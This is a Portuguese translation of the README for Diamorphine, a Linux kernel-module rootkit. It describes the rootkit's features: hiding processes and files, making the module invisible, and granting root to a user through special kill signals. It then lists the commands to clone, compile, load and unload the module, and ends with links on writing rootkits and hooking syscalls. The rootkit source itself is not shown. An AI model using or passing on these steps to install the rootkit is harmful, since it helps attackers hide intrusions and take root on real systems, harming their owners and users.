
LKM rootkit para Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 e ARM64)
Diamorphine é um rootkit LKM para kernels Linux 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 e ARM64)
Quando carregado, o módulo inicia invisível;
Oculta/exibe qualquer processo enviando um sinal 31;
Enviar um sinal 63 (para qualquer pid) torna o módulo (in)visível;
Enviar um sinal 64 (para qualquer pid) torna o usuário especificado root;
Arquivos ou diretórios que começam com MAGIC_PREFIX tornam-se invisíveis;
Verifique se o kernel é 2.6.x/3.x/4.x/5.x/6.x
uname -r
Clone o repositório
git clone https://github.com/m0nad/Diamorphine
Entre na pasta
cd Diamorphine
Compile
make
Carregue o módulo (como root)
insmod diamorphine.ko
O módulo inicia invisível; para removê-lo, você precisa torná-lo visível
kill -63 0
Em seguida, remova o módulo (como root)
rmmod diamorphine
Wikipedia Rootkit https://en.wikipedia.org/wiki/Rootkit
Linux Device Drivers http://lwn.net/Kernel/LDD3/
LKM HACKING https://web.archive.org/web/20140701183221/https://www.thc.org/papers/LKM_HACKING.html
Blog do Memset http://memset.wordpress.com/
Correção de kernel Linux on-the-fly sem LKM http://phrack.org/issues/58/7.html
ESCREVENDO UM ROOTKIT SIMPLES PARA LINUX https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
Linux Cross Reference http://lxr.free-electrons.com/
zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/
Rootkits Linux: Novos Métodos para Kernel 5.7+ https://xcellerator.github.io/posts/linux_rootkits_11/
FlipSwitch: uma Nova Técnica de Hooking de Syscall https://www.elastic.co/security-labs/flipswitch-linux-rootkit